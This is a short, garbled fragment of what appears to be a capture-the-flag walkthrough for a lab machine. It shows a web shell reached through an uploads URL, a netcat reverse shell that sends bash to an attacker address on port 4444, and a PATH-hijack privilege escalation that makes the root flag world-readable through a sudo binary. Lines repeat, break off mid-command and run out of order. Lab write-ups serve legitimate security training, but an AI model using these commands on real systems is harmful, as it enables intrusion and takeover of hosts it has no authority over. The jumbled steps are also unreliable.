Use gobuster :
Run strings /usr/bin/crackerfg – it calls a system command: hashgen . crackerfg
http://10.10.10.10/uploads/shell.fg?cmd=id Use gobuster : Run strings /usr/bin/crackerfg – it
Read the flag:
Check path hijacking:
echo '#!/bin/bash' > /tmp/hashgen echo 'chmod 777 /root/root.txt' >> /tmp/hashgen chmod +x /tmp/hashgen export PATH=/tmp:$PATH sudo /usr/bin/crackerfg Now /root/root.txt is readable. /tmp/hashgen echo 'chmod 777 /root/root.txt' >
You get RCE as www-data . # On attacker machine nc -lvnp 4444 Via the web shell cmd=nc -e /bin/bash 10.10.14.14 4444